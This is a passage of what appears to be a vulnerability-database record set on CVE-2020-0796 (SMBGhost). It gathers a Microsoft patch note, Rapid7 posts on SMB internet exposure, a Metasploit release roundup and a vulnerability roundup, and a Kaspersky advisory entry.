Key changes include:\n\n * Security update to the Microsoft Server Message Block 3.1.1 (SMBv3).\n\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\nKnown issues in this update**Symptom**| **Workaround** \n---|--- \nWhen using Windows Server containers with the March 10, 2020 updates, you might encounter issues with 32-bit applications and processes.| For important guidance on updating Windows containers, please see [Windows container version compatibility](<https://docs.microsoft.com/en-us/virtualization/windowscontainers/deploy-containers/version-compatibility?tabs=windows-server-1909%2Cwindows-10-1909>) and [Update Windows Server containers](<https://docs.microsoft.com/en-us/virtualization/windowscontainers/deploy-containers/update-containers>). \nDevices using a manual or auto-configured proxy, especially with a virtual private network (VPN), might show limited or no internet connection status in the Network Connectivity Status Indicator (NCSI) in the notification area. This might happen when connected to or disconnected from a VPN or after changing the state between the two. Devices with this issue might also have issues reaching the internet using applications that use WinHTTP or WinInet. 
Examples of apps that might be affected on devices in this state include, but are not limited to, Microsoft Teams, Microsoft Office, Microsoft Office 365, Microsoft Outlook, Internet Explorer 11, and some versions of Microsoft Edge.| This issue is resolved in KB4554364. \nDevices on a domain might be unable to install apps published using a Group Policy Object (GPO). This issue only affects app installations that use .msi files. It does not affect any other installation methods, such as from the Microsoft Store.| This issue is resolved in KB4549951. \nAfter installing this update on a Windows 10 device with a wireless wide area network (WWAN) LTE modem, reaching the internet might not be possible. However, the Network Connectivity Status Indicator (NCSI) in the notification area might still indicate that you are connected to the internet.| This issue is resolved in KB4559004. \nHow to get this update**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4541338) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. 
\nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4551762>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4551762](<https://download.microsoft.com/download/f/7/9/f791a285-889c-4167-8f50-7f8f1aecdf33/4551762.csv>). **Note** Some files erroneously have \u201cNot applicable\u201d in the \u201cFile version\u201d column of the CSV file. This might lead to false positives or false negatives when using some third-party scan detection tools to validate the build.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T07:00:00", "type": "mskb", "title": "March 12, 2020\u2014KB4551762 (OS Builds 18362.720 and 18363.720) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T07:00:00", "id": "KB4551762", "href": "https://support.microsoft.com/en-us/help/4551762", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-09-29T08:39:07", "description": "\n\nWelcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?\n\nSo, here we are! What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)\n\n \n\n\n## SMB (TCP/445)\n\n_Choosy worms choose SMB._\n\n#### TLDR\n\n**WHAT IT IS: **SMB is the Windows everything protocol, but is usually used for Windows-based file transfers.\n\n**HOW MANY:** 593,749 discovered nodes\n\n**VULNERABILITIES: **The most destructive internet worms in history use SMB in some way.\n\n**ADVICE: **Direct access to SMB outside of an unroutable, local network should be prohibited as a general rule.\n\n**ALTERNATIVES:** HTTPS-based file sharing is usually the answer for whatever file hosting SMB was intending, but most SMB exposures seem to be accidental.\n\n**GETTING:** Better! ZOMGOSH! Thanks mostly to ISPs, there was a 16% decrease in exposure from 2019.\n\n### SMB discovery details\n\nSMB is a continued source of heartache and headaches for network operators the world over. 
Originally designed to operate on local area network protocols like NetBEUI and IPX/SPX, SMBv1 was ported to the regular TCP/IP network that the rest of the internet runs on. Since then, SMBv2 and SMBv3 have been released. While SMB is primarily associated with Windows-based computers for authentication, file sharing, print services, and process control, SMB is also maintained for non-Windows operating systems in implementations such as Samba and Netsmb. As a binary protocol with negotiable encryption capabilities, it is a complex protocol. This complexity, along with its initial proprietary nature and deep couplings with the operating system kernel, makes it an ideal field for discovering security vulnerabilities that can enable remote code execution (RCE). On top of this, the global popularity of Windows as a desktop operating system ensures it remains a popular target for bug hunters and exploiters alike.\n\n\n\n### Exposure information\n\nMany of the most famous vulnerabilities, exploits, and in-the-wild worms have leveraged SMB in some way. [WannaCry](<https://blog.rapid7.com/2019/05/13/wannacry-two-years-on-current-threat-landscape-forgotten-lessons-and-hope-for-the-future/>) and [NotPetya](<https://www.rapid7.com/security-response/petya/>) are two of the most recent events that centered on SMB, both for exploitation and for transmission. Prior SMB-based attacks include the Nachi and Blaster worms (2003\u20132005), and future SMB-based attacks will likely include [SMBGhost](<https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost>). 
In addition to bugs, intended features of SMB\u2014notably, automatic hash-passing\u2014make it an ideal mechanism to steal password hashes from unsuspecting victims, and SMB shares (network-exposed directories of files) continue to be accidentally exposed to the internet via server mismanagement and too-easy-to-use network-attached storage (NAS) devices.\n\nAs expected, the preponderance of SMB services available on the internet are Windows-based, but the table below shows there is also a sizable minority of non-Windows SMB available.\n\nSMB Server Kind | Count \n---|--- \nWindows (Server) | 298,296 \nLinux/Unix/BSD/SunOS (Samba) | 170,095 \nWindows (Desktop) | 110,340 \nQNAP NAS Device | 10,164 \nOther/Honeypot | 1,914 \nApple Time Capsule or macOS | 1,465 \nWindows (Embedded) | 703 \nKeenetic NAS | 647 \nPrinter | 386 \nZyxel NAS | 6 \nEMC NAS | 5 \n \nAs you can see, these non-Windows nodes are typically some type of NAS system used in otherwise largely Windows environments, and are responsible for maintaining nearline backup systems. While these devices are unlikely to be vulnerable to exactly the same exploits that dog Windows systems, the mere fact that these **backups are exposed to the internet** means that, eventually, these network operators are Going To Have A Bad Time if and when they get hit by the next wave of ransomware attacks.\n\n### Unattended installs\n\nOf the Windows machines exposed to the internet, we can learn a little about their provenance from the Workgroup strings that we're able to see from [Sonar scanning](<https://www.rapid7.com/research/project-sonar/>). The list below indicates that the vast majority of these machines are using the default WORKGROUP workgroup, with others being automatically generated as part of a standard, unattended installation. 
In a magical world where SMB is both rare and safe to expose to the internet, we would expect those machines to be manually configured and routinely patched.\n\nThis is not the case, though\u2014these Windows operating systems were very likely installed and configured automatically, with no special care given to their exposed-to-the-internet status, so the exposure is almost certainly accidental and not serving some special, critical business function. Additionally, these aftermarket-default WORKGROUPS are also giving away hints about which specific Windows- or Samba-based build is being used in production environments, and can give attackers ideas about targeting those systems.\n\nWorkgroup | Count \n---|--- \n`WORKGROUP` | 204,014 \n`WIN-<string e.g. 4RGO6K0U19F>` | 98,153 \n`MICROSO-<string e.g. HCBD8KK>` | 27,213 \n`SERVER[####]` | 15,721 \n`HK-<number e.g. 2723>` | 12,823 \nIP Address | 10,367 \n`DESKTOP-<string e.g. HUDL8UO>` | 7,203 \n`HKSRV[####]` | 6,160 \n`RS-<string e.g. A2-084` | 6,017 \n`XR-<string e.g. 20190714REWT>` | 4,448 \n`QNSERVER[####]` | 4,067 \n`PC-<string e.g. HCBD8KK>` | 4,034 \n`CCSERVER[####]` | 3,807 \n`SVR-<number e.g. 20191106VUM>` | 3,303 \n`MYGROUP` | 3,269 \n`MSHOME` | 3,060 \n`SRV*` | 2,910 \n`SERVER` | 2,476 \n`VM*` | 2,186 \n`TKO[####]` | 2,088 \n \n### Attacker\u2019s view\n\nRegardless of the version and configuration of cryptographic and other security controls, SMB is inappropriate for today's internet. It is too complex to secure reliably, and critical vulnerabilities that are attractive to criminal exploitation continue to surface in the protocol. With that said, SMB continues to be a critical networking layer in office environments of any size, and since it\u2019s native to TCP/IP, network misconfigurations can inadvertently expose SMB-based resources directly to the internet. 
**Every organization should be continually testing its network ingress and egress filters for SMB traffic**\u2014not only to prevent outsiders from sending SMB traffic to your accidentally exposed resources, but to prevent internal users from accidentally leaking SMB authentication traffic out into the world.\n\nApproximately 640,000 unique IP addresses visited our high-interaction SMB honeypots over the measured period, but rather than think of this as a horde of SMB criminals, we should recall that the vast majority of those connections are from machines on the internet that were, themselves, compromised. After all, that's how worms work. Very few of these connections were likely sourced from an attacker's personally owned (rather than pwned) machine. With this in mind, our honeypot traffic gives us a pretty good idea of which countries are, today, most exposed to the next SMB-based mega-worm like WannaCry: Vietnam, Russia, Indonesia, Brazil, and India are all at the top of this list.\n\n\n\nAmong the cloud providers, things are more stark. EternalBlue, the exploit underpinning WannaCry, was responsible for about 1.5 million connections to our honeypots from Digital Ocean, while Microsoft Azure was the source of about 8 million (non-EternalBlue) connections (of which, about 15%, or 1.2 million or so, were accidental connections due to a misconfiguration at Azure). 
We're not yet sure why this wild discrepancy in attack traffic versus accidental traffic exists between Digital Ocean and Azure, but we suspect that Microsoft is much more aggressive about making sure the default offerings at Azure are patched against MS17-010, while Digital Ocean appears to be more hands-off about patch enforcement, leaving routine maintenance to its user base.\n\n\n\n### Our advice\n\n**IT and IT security teams** should prohibit SMB access to, or from, their organization over anything but VPN-connected networks, and regularly scan their known, externally facing IP address space for misconfigured SMB servers. \n\n**Cloud providers** should prohibit SMB access to cloud resources, and at the very least, routinely scrutinize SMB access to outside resources. Given that approximately 15% of our inbound honeypot connections over SMB from Microsoft Azure are actually misconfigurations, rather than attacks or research probes, Azure should be especially aware of this common flaw and make it difficult to impossible to accidentally expose SMB at the levels that are evident today.\n\n**Government cybersecurity agencies **should be acutely aware of their own national exposure to SMB, and institute routine scanning and notification programs to shut down SMB access wherever it surfaces. 
This is especially true for those countries that are at the top of our honeypot source list.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2020-09-18T15:11:21", "type": "rapid7blog", "title": "NICER Protocol Deep Dive: Internet Exposure of SMB", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-09-18T15:11:21", "id": "RAPID7BLOG:614648646663CF660156AD39ED9421B3", "href": "https://blog.rapid7.com/2020/09/18/nicer-protocol-deep-dive-internet-exposure-of-smb/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-28T16:58:28", "description": "## RCE Exploit For CVE-2020-0796 (SMBGhost)\n\n\n\nThis week our very own Spencer McIntyre has added an exploit for [CVE-2020-0796](<https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost?referrer=blog>), which leverages a vulnerability within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol to gain unauthenticated remote code execution against unpatched Windows 10 v1903 and v1909 systems. Previously, Metasploit offered an LPE version of this exploit but not RCE support. The exploit is heavily based on the [chompie1337/SMBGhost_RCE_PoC PoC](<https://github.com/chompie1337/SMBGhost_RCE_PoC>).\n\nNote that there is a high probability that, even when the exploit is successful, the remote target will crash within about 90 minutes. It is recommended that after a successful compromise, a persistence mechanism be established and the system be rebooted to avoid a Blue Screen of Death (BSOD).\n\n## Improved command history management\n\nCommunity member [pingport80](<https://github.com/pingport80>) has made improvements to Metasploit's command history management to now be context aware. The command history for both the main console and sub-shells, such as Pry and Meterpreter, will now have their command history separated. 
This means that pressing the up arrow key within the console in these different contexts will now only show the command history for that specific context sub-shell, which should be more intuitive to users.\n\n## New module content (2)\n\n * [SMBv3 Compression Buffer Overflow](<https://github.com/rapid7/metasploit-framework/pull/15024>) by Spencer McIntyre, chompie1337, and hugeh0ge, which exploits [CVE-2020-0796](<https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost?referrer=blog>) \\- This adds an exploit for CVE-2020-0796 which can be used to gain unauthenticated remote code execution against unpatched Windows 10 v1903 and v1909 systems.\n * [Git Ignore Retriever](<https://github.com/rapid7/metasploit-framework/pull/14984>) by N!ght Jmp - Adds an OSX Post exploitation module to retrieve `.gitignore` files that may contain pointers to files of interest\n\n## Enhancements and features\n\n * [#15062](<https://github.com/rapid7/metasploit-framework/pull/15062>) from [pingport80](<https://github.com/pingport80>) \\- Adds support for separating command history for the various sub-shells such as Meterpreter and Pry\n * [#15079](<https://github.com/rapid7/metasploit-framework/pull/15079>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This introduces the `meterpreter` key to the `compat` hash to better-provide Meterpreter session compatibility info to users, including printing the required Meterpreter extension(s) to the console in the event of a session incompatibility. 
Additionally, `post` modules will automatically load Meterpreter extensions used, provided that the module's Meterpreter compatibility requirements are annotated.\n * [#15199](<https://github.com/rapid7/metasploit-framework/pull/15199>) from [pingport80](<https://github.com/pingport80>) \\- This improves the `get_processes` API on non-Windows systems with support that fails back to enumerating the `/proc` directory when the `ps` utility is not present.\n * [#15220](<https://github.com/rapid7/metasploit-framework/pull/15220>) from [bogey3](<https://github.com/bogey3>) \\- This modification adds the ability to retrieve the OS version from \nan NTLMSSP type 2 message.\n * [#15242](<https://github.com/rapid7/metasploit-framework/pull/15242>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates the tables displayed by the `loot` command to be displayed without wrapping. This makes it easier for users to copy and paste the output.\n * [#15243](<https://github.com/rapid7/metasploit-framework/pull/15243>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds a check method to the Apache Tomcat Ghostcat module\n * [#15246](<https://github.com/rapid7/metasploit-framework/pull/15246>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- This refactors some common functionality into a cross-platform `Msf::Post::Process` mixin with support for multiple session types.\n\n## Bugs fixed\n\n * [#15216](<https://github.com/rapid7/metasploit-framework/pull/15216>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a mistake in the exploit for CVE-2021-21551 where the version fingerprinting is overly specific. Windows 10 build 18363 failed because it didn't match the explicit build number 18362. 
This PR changes the fingerprinting to use ranges to fix this problem.\n * [#15223](<https://github.com/rapid7/metasploit-framework/pull/15223>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- This updates the `exploit/windows/local/tokenmagic` module by fixing a crash that occurs on some targets and moves the target validation logic to earlier in the module.\n * [#15236](<https://github.com/rapid7/metasploit-framework/pull/15236>) from [Apeironic](<https://github.com/Apeironic>) \\- This adds an additional check to the Linux `checkvm` module to fix a bug where it was failing to identify certain Xen environments such as those used within AWS.\n * [#15240](<https://github.com/rapid7/metasploit-framework/pull/15240>) from [mcorybillington](<https://github.com/mcorybillington>) \\- This fixes a typo that was present in the template for GitHub pull requests.\n * [#15241](<https://github.com/rapid7/metasploit-framework/pull/15241>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Removes the previously prototyped `RHOST_HTTP_URL` module option and feature flag as it had blocking edge cases for being enabled by default. 
A new implementation is being investigated.\n * [#15262](<https://github.com/rapid7/metasploit-framework/pull/15262>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Improved `msfvenom` to only wrap output if the output is going to STDOUT.\n * [#15267](<https://github.com/rapid7/metasploit-framework/pull/15267>) from [e2002e](<https://github.com/e2002e>) \\- This fixes a bug that was present within the Shodan search module where certain queries would cause an exception to be raised while processing the results.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.45...6.0.46](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-05-19T10%3A47%3A33-05%3A00..2021-05-27T16%3A09%3A36-04%3A00%22>)\n * [Full diff 6.0.45...6.0.46](<https://github.com/rapid7/metasploit-framework/compare/6.0.45...6.0.46>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-05-28T15:42:16", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2021-21551"], "modified": "2021-05-28T15:42:16", "id": "RAPID7BLOG:D560044511D0D460EB8BD73E6B8C9EB7", "href": "https://blog.rapid7.com/2021/05/28/metasploit-wrap-up-113/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-29T14:42:12", "description": "\n\nSpooky season is in full swing, and we\u2019re not just talking about Halloween. 
[Security vulnerabilities](<https://www.rapid7.com/fundamentals/vulnerabilities-exploits-threats/>) can range from tiny errors to large-scale gaps in protection, and all have different consequences. We put together a list of some of the scariest vulnerabilities of the year (the tricks!) and the remediation solutions that can help you stay on guard in the future (the treats!).\n\n## [SMBghost](<https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost?referrer=search>)\n\n\n\n**The Trick: **SMBghost is a [buffer overflow vulnerability](<https://blog.rapid7.com/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/>) when compression is enabled in Microsoft SMB Servers. The vulnerability is due to an error when the vulnerable software handles a maliciously crafted compressed data packet. A remote, unauthenticated attacker can exploit this to execute arbitrary code within the context of the application. Yikes!\n\nThe impact that the exploitation of this vulnerability has is very high, due to this having the ability to be exploited remotely and the sense that it grants system-level access in kernel mode. This vulnerability has also been deemed as wormable, which makes it a priority for attackers to utilize.\n\n**The Treat: **Though the attacker value is very high, most [AttackerKB](<https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost>) users have noted that the vuln\u2019s exploitability is relatively low. Microsoft has since released a patch for this vulnerability and suggests that users take proper precaution when enabling compression within SMB. 
Now, with many knowledge workers still stuck at home thanks to the pandemic, and therefore not spending a lot of time hanging out in SMB-heavy environments, this sequestration might actually be limiting the value of this and other SMB vulnerabilities\u2014maybe working from home might actually be good for security!\n\n## [BlueGate](<https://attackerkb.com/topics/Er1dwnOh2a/windows-remote-desktop-gateway-rce-cve-2020-0609?referrer=search>)\n\n\n\n**The Trick: **A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs, view, change, or delete data, or create new accounts with full user rights. A ghost-like attacker messing with your data? Pretty spooky.\n\n**The Treat: **This ghost is probably going away with regular and timely security patches. Though it goes against expert advice to deploy right smack on the internet, maintainers of such servers just need to keep up on their patches in the same way a typical IIS administrator does. The Microsoft-issued update addresses the vulnerability by correcting how RD Gateway handles connection requests.\n\n## [Ripple20](<https://attackerkb.com/topics/EZhbaWNnwV/ripple20-treck-tcp-ip-stack-vulnerabilities?referrer=search>)\n\n\n\n**The Trick: **In June, security firm JSOF published research on a collection of 19 vulnerabilities in a low-level TCP/IP software library developed by Treck, a company that has distributed embedded internet protocols since the \u201990s. The 19 vulnerabilities \u201caffect hundreds of millions of devices (or more),\u201d thanks to the ripple effect of the supply chain. Consider \u201c19\u201d to be quite the opposite of a magic number. 
The 19 vulnerabilities are not equal in their severity and potential impact and are likely to persist for some time. \n\n\n**The Treat: **Is there any good news? Well, the practical attacker value of this suite of vulnerabilities is, on the whole, relatively low. This is in large part because of the lack of attack scalability: Each attack will, in all likelihood, need to be tailor-made for the target device, and even the value of targeting specific devices is heavily dependent on device capabilities and the context in which that device is used. The Treck TCP/IP stack is geared toward low-resource devices, which makes the Ripple20 vulnerabilities significantly less likely to be targeted in resource-heavy attacks such as crypto-mining or ransomware campaigns. If users want to change course from a scary ending to a happy one, users are best served by applying detections at the edge and internal network level to filter out malformed TCP/IP packets, IP fragments, and other lesser-used networking features, where possible.\n\n## [Bad Neighbor](<https://attackerkb.com/topics/17lFRTT1DO/cve-2020-16898-aka-bad-neighbor-ping-of-death-redux>)\n\n\n\n**The Trick:** Bad Neighbor is a remote code execution vulnerability that arises when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploits this vulnerability could gain the ability to execute code on the target server or client. The vulnerability has garnered broad attention as potentially wormable. This bad neighbor is probably someone who gives out wormable apples instead of candy.\n\n**The Treat: **You can\u2019t call the homeowners association on this one, but we recommend applying the patch for CVE-2020-16898 (Bad Neighbor) as soon as possible. 
For those who are unable to patch immediately, consider disabling ICMPv6 RDNSS as a workaround.\n\n## [RECON](<https://blog.rapid7.com/2020/07/14/pay-attention-to-your-sap-security/>)\n\n\n\n**The Trick: **This critical [SAP vulnerability (RECON)](<https://attackerkb.com/topics/JubO1RiVBP/cve-2020-6287-critical-vulnerability-in-sap-netweaver-application-server-as-java#rapid7-analysis>) from July affects the SAP NetWeaver Application Server (AS) Java component LM Configuration Wizard. Though a few months have passed since its publication, it\u2019s still a big deal, especially since exploit code is publicly available. Businesses rely on SAP for a wide variety of processes, capturing everything from financial data to business intelligence. Most organizations use it as a tool to manage compliance and ensure access is provisioned (and, more importantly, deprovisioned) with urgency. The critical component to this vulnerability is that it does not require authentication to exploit, meaning any SAP NetWeaver system with the vulnerable components exposed to the internet\u2014currently estimated to be at least 4,000\u2014can be trivially compromised to wreak havoc on business systems. _So, yeah, this one is big-time scary._\n\n**The Treat:** This trick feels more like a long con. And how do you unravel the layers and remediate a long con? Conversations should begin with IT by identifying which physical or virtual assets are affected. SAP NetWeaver serves as the base layer for many SAP products, so many applications and processes are likely affected. Understanding how many systems you need to apply this patch to will help you begin to communicate estimated downtime to the business. Treating vulnerabilities, especially severe ones like this, is an exercise in diplomacy, politics, and trade-offs. For some, this will require removing SAP\u2019s direct access to the internet. For others, it will require implementing WAF and/or IPS rules. 
CISA strongly recommends closely monitoring SAP NetWeaver AS for anomalous activity. SAP customers should be on the lookout for unusual processes spawned under the context of users that match the <sid>adm naming convention. File metadata may also be a good way to identify when SAP NetWeaver software spawns non-SAP binaries. Rapid7 also recommends ensuring that any web service does not run using a privileged account. For others, it will result in accepting the risk. The key message here is to sit down with all stakeholders, including business leaders, to get on the same page about the severity of this vulnerability, develop and activate a treatment plan, and make sure to have, at a minimum, detective controls in place to respond.\n\n## [SigRed](<https://attackerkb.com/topics/egp32neD6z/cve-2020-1350-windows-dns-server-remote-code-execution-sigred>)\n\n\n\n**The Trick: **A remote code execution vulnerability codenamed \u201cSigRed\u201d exists in Windows Domain Name System servers when they fail to properly handle requests. Successful exploitation can result in domain administrator privileges, compromising critical business data, assets, and infrastructure. If that wasn\u2019t scary enough, Homeland Security decided to get involved. The U.S. Department of Homeland Security issued an emergency directive on July 16, 2020 requiring federal agencies to patch or mitigate the vulnerability within 24 hours\u2014only the third time CISA\u2019s current director has taken such an action. As with any vulnerability known to be wormable, CVE-2020-1350, or SigRed, will make an attractive target for ransomware campaigns in addition to stealthier threat actors.\n\n**The Treat: **CISA put out urgent guidance to those who have Windows servers running DNS: patch on an emergency basis. 
Microsoft released guidance on mitigations for those who cannot patch, but as with other recent high-severity, high-urgency vulnerabilities, it is highly recommended that defenders prioritize patching over mitigation wherever possible. When attacker value is this high, don\u2019t just run for the hills\u2014instead, follow the rules and prioritize patching to keep monsters out of your servers.\n\n## [Curveball](<https://blog.rapid7.com/2020/01/16/cve-2020-0601-windows-cryptoapi-spoofing-vulnerability-what-you-need-to-know/>)\n\n\n\n**The Trick: **In January,** **a flaw [(CVE-2020-0601 or Curveball)](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0601>) was found in the way the Microsoft Windows CryptoAPI performs certificate validation, allowing attackers to spoof X.509 vulnerabilities. This is core cryptographic functionality used by a number of different software components, with far-reaching impact ranging from programming languages to web browsers.\n\n**The Treat: **This year started out with a fright, but there are some silver linings. The mitigation steps taken by Microsoft and others (e.g., Google Chrome) to detect and alert users to exploitation attempts are a welcome development for defenders and users. Windows Update services were not affected by this due to extended hardening in years past, showing that defense-in-depth is important for maintaining critical infrastructure. This vulnerability also highlights a specification flaw that software projects should heed: Untested features are likely vulnerable features. Because this vulnerability is in an extremely seldom-used feature of the TLS specification that allows users to specify their own elliptical curves, it meant the feature was largely untested. Vulnerability hunters and defenders may be on the lookout for similar bugs in other TLS implementations in the future.\n\nIt\u2019s Halloween, not April fools, and these vulnerabilities are no joke. 
As with any security scare, it\u2019s important not only to remediate, but to reflect on what we can learn from these mistakes. If you\u2019re looking for more visibility into which of these vulnerabilities is present in your organization, learn more about [our vulnerability management tool, InsightVM](<https://www.rapid7.com/products/insightvm/>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2020-10-29T13:59:06", "type": "rapid7blog", "title": "Trick or Treat! What We Can Learn from the Spookiest Vulnerabilities of the Year", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0609", "CVE-2020-0796", "CVE-2020-1350", "CVE-2020-16898", "CVE-2020-6287"], "modified": "2020-10-29T13:59:06", "id": "RAPID7BLOG:E36C557104ECB6E144C21C3C499B0492", "href": "https://blog.rapid7.com/2020/10/29/trick-or-treat-what-we-can-learn-from-the-spookiest-vulnerabilities-of-the-year/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2022-01-19T18:15:56", "description": "### *Detect date*:\n03/12/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nA remote code execution vulnerability in Windows SMBv3 Client/Server can be exploited remotely via specially crafted packet to execute arbitrary code.\n\n### *Exploitation*:\nThis vulnerability can be exploited by the following malware:\n\n### *Affected products*:\nWindows 10 Version 1909 for 32-bit Systems \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1903 for 32-bit Systems \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update 
usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-0796](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0796>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2020-0796](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796>)7.5Critical\n\n### *KB list*:\n[4551762](<http://support.microsoft.com/kb/4551762>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-12T00:00:00", "type": "kaspersky", "title": "KLA11693 ACE vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", 